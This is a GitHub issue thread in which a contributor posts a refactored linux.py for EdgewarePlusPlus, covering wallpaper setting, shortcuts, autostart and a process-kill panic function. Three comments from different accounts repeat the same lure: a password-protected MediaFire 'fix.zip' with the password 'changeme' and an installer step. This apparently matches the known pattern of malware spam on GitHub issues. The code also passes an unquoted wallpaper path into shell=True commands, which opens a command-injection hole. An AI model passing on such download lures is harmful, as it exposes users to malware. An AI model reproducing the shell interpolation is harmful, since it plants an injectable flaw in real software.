### ISSUE TITLE
refactored linux.py =)

### ISSUE THREAD

**Issue by s-b-repo** [araten10/EdgewarePlusPlus#69]
import codecs
import json
import logging
import os
import re
import shlex
import shutil
import subprocess
import sys
from configparser import ConfigParser
from pathlib import Path

from utils.paths import Defaults, Process

def panic_script():
    subprocess.run('pkill -u $USER -fi -9 "python.* *+.pyw"', shell=True)

def set_borderless(root):
    root.wm_attributes("-type", "splash")

def set_vlc_window(media_player, window_id):
    media_player.set_xwindow(window_id)

def set_wallpaper(wallpaper_path: Path | str) -> bool:
    global first_run

    wallpaper_path = str(wallpaper_path.absolute()) if isinstance(wallpaper_path, Path) else wallpaper_path
    desktop_env = _get_desktop_environment()

    commands = {
        "gnome": [
            ["gsettings", "set", "org.gnome.desktop.background", "picture-uri", f"file://{wallpaper_path}"],
            ["gsettings", "set", "org.gnome.desktop.background", "picture-uri-dark", f"file://{wallpaper_path}"]
        ],
        "mate": [
            ["gsettings", "set", "org.mate.background", "picture-filename", wallpaper_path]
        ],
        "xfce4": [
            ["xfconf-query", "-c", "xfce4-desktop", "-p", "/backdrop/screen0/monitor0/image-path", "-s", wallpaper_path],
            ["xfconf-query", "-c", "xfce4-desktop", "-p", "/backdrop/screen0/monitor0/image-style", "-s", "3"],
            ["xfconf-query", "-c", "xfce4-desktop", "-p", "/backdrop/screen0/monitor0/image-show", "-s", "true"]
        ],
        "sway": [
            ["swaybg", "-o", "*", "-i", wallpaper_path, "-m", "fill"]
        ],
        "hyprland": [
            ["hyprctl", "hyprpaper", "preload", wallpaper_path],
            ["hyprctl", "hyprpaper", "wallpaper", f", {wallpaper_path}"]
        ],
        "icewm": [
            ["icewmbg", wallpaper_path]
        ],
        "blackbox": [
            ["bsetbg", "-full", wallpaper_path]
        ],
        "lxde": [
            ["pcmanfm", "--set-wallpaper", wallpaper_path, "--wallpaper-mode=scaled"]
        ],
        "windowmaker": [
            ["wmsetbg", "-s", "-u", wallpaper_path]
        ]
    }

    def execute_commands(cmds):
        for cmd in cmds:
            subprocess.Popen(cmd)

    try:
        if desktop_env in commands:
            execute_commands(commands[desktop_env])
        elif desktop_env in ["fluxbox", "jwm", "openbox", "afterstep"]:
            subprocess.Popen(["fbsetbg", wallpaper_path])
        else:
            _wm_set_background(wallpaper_path)
        
        first_run = False if "first_run" in globals() else True
        return True

    except Exception:
        sys.stderr.write("ERROR: Failed to set wallpaper. There might be a bug.\n")
        return False

def hide_file(path: Path | str):
    path = Path(path)
    hidden_path = path.parent / f".{path.name}"
    if path.exists():
        path.rename(hidden_path)

def show_file(path: Path | str):
    path = Path(path)
    hidden_path = path.parent / f".{path.name}"
    if hidden_path.exists():
        hidden_path.rename(path)

def open_directory(url: str):
    subprocess.Popen(["xdg-open", url])

def does_desktop_shortcut_exist(name: str) -> bool:
    shortcut_path = Path(os.path.expanduser("~/Desktop")) / f"{name}.desktop"
    return shortcut_path.exists()

def make_shortcut(title: str, process: Path, icon: Path, location: Path | None = None) -> bool:
    try:
        with open(Defaults.CONFIG, "r") as f:
            default_settings = json.load(f)
            version = default_settings["versionplusplus"]

        shortcut_content = f"""[Desktop Entry]
Version={version}
Name={title}
Exec={shlex.join([str(sys.executable), str(process)])}
Icon={icon}
Terminal=false
Type=Application
Categories=Application;"""

        file_name = f"{title.lower()}.desktop"
        file = (location if location else Path(os.path.expanduser("~/Desktop"))) / file_name

        file.write_text(shortcut_content)
        
        if _get_desktop_environment() == "gnome":
            subprocess.run(["gio", "set", str(file.absolute()), "metadata::trusted", "true"])
            
        return True
    
    except Exception:
        logging.warning("Failed to create shortcut")
        return False

def toggle_run_at_startup(state: bool):
    autostart_path = Path(os.path.expanduser("~/.config/autostart"))
    try:
        if state:
            make_shortcut("Edgeware", Process.START, Defaults.ICON, autostart_path)
        else:
            (autostart_path / "edgeware.desktop").unlink()
    except Exception:
        logging.warning("Failed to toggle autostart")

def _get_config_dir(app_name: str) -> str:
    confighome = os.environ.get("XDG_CONFIG_HOME", os.path.expanduser("~/.config"))
    return os.path.join(confighome, app_name)

def _is_running(process: str) -> bool:
    s = subprocess.Popen(["ps", "axw"], stdout=subprocess.PIPE)
    if s.stdout:
        return any(re.search(process, line.decode().strip()) for line in s.stdout)
    return False

def _get_desktop_environment() -> str:
    desktop_session = os.environ.get("XDG_CURRENT_DESKTOP") or os.environ.get("DESKTOP_SESSION", "").lower()
    known_envs = [
        "gnome", "unity", "cinnamon", "mate", "xfce4", "lxde", "fluxbox", "blackbox",
        "openbox", "icewm", "jwm", "afterstep", "trinity", "kde", "i3", "awesome",
        "hyprland", "dwm", "xmonad", "bspwm", "sway", "razor-qt", "windowmaker"
    ]

    if desktop_session:
        if any(env in desktop_session for env in known_envs):
            return desktop_session
        elif "xfce" in desktop_session or desktop_session.startswith("xubuntu"):
            return "xfce4"
        elif desktop_session.startswith("ubuntustudio"):
            return "kde"
        elif desktop_session.startswith("ubuntu"):
            return "gnome"
        elif desktop_session.startswith("lubuntu"):
            return "lxde"
        elif desktop_session.startswith("kubuntu"):
            return "kde"
        elif desktop_session.startswith("pop"):
            return "gnome"

    if os.environ.get("KDE_FULL_SESSION") == "true":
        return "kde"
    elif os.environ.get("GNOME_DESKTOP_SESSION_ID") and "deprecated" not in os.environ.get("GNOME_DESKTOP_SESSION_ID"):
        return "gnome2"
    elif _is_running("xfce-mcs-manage"):
        return "xfce4"
    elif _is_running("ksmserver"):
        return "kde"

    return "unknown"

def _wm_set_background(wallpaper_path: Path | str):
    global first_run

    session = os.environ.get("XDG_SESSION_TYPE", "").lower()  # "x11" or "wayland"
    wallpaper_path = str(wallpaper_path)

    wallpaper_setters = {
        "x11": [
            ("nitrogen", lambda: f"nitrogen --set-zoom-fill {wallpaper_path}"),
            ("feh", lambda: f"feh --bg-scale {wallpaper_path}"),
            ("habak", lambda: f"habak -ms {wallpaper_path}"),
            ("hsetroot", lambda: f"hsetroot -fill {wallpaper_path}"),
            ("chbg", lambda: f"chbg -once -mode maximize {wallpaper_path}"),
            ("qiv", lambda: f"qiv --root_s {wallpaper_path}"),
            ("xv", lambda: f"xv -max -smooth -root -quit {wallpaper_path}"),
            ("xsri", lambda: f"xsri --center-x --center-y --scale-width=100 --scale-height=100 {wallpaper_path}"),
            ("xli", lambda: f"xli -fullscreen -onroot -quiet -border black {wallpaper_path}"),
            ("xsetbg", lambda: f"xsetbg -fullscreen -border black {wallpaper_path}"),
            ("fvwm-root", lambda: f"fvwm-root -r {wallpaper_path}"),
            ("wmsetbg", lambda: f"wmsetbg -s -S {wallpaper_path}"),
            ("Esetroot", lambda: f"Esetroot -scale {wallpaper_path}"),
            ("display", lambda: f"display -sample `xwininfo -root 2> /dev/null|awk '/geom/{{print $2}}'` -window root {wallpaper_path}")
        ],
        "wayland": []
    }

    try:
        setters = wallpaper_setters.get(session, [])
        for prog, cmd in setters:
            if shutil.which(prog):
                subprocess.run(cmd(), shell=True)
                return

        if first_run:
            subprocess.run(f"nitrogen --set-zoom-fill {wallpaper_path}", shell=True)
            first_run = False
        else:
            raise Exception("No suitable program found to set wallpaper.")

    except Exception:
        sys.stderr.write("ERROR: Failed to set wallpaper on window manager.\n")

**Comment by s-b-repo** [comment]
https://pastebin.com/jA7SR28x

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LewdDevelopment** [comment]
Some improvements from this are included in the rewrite.
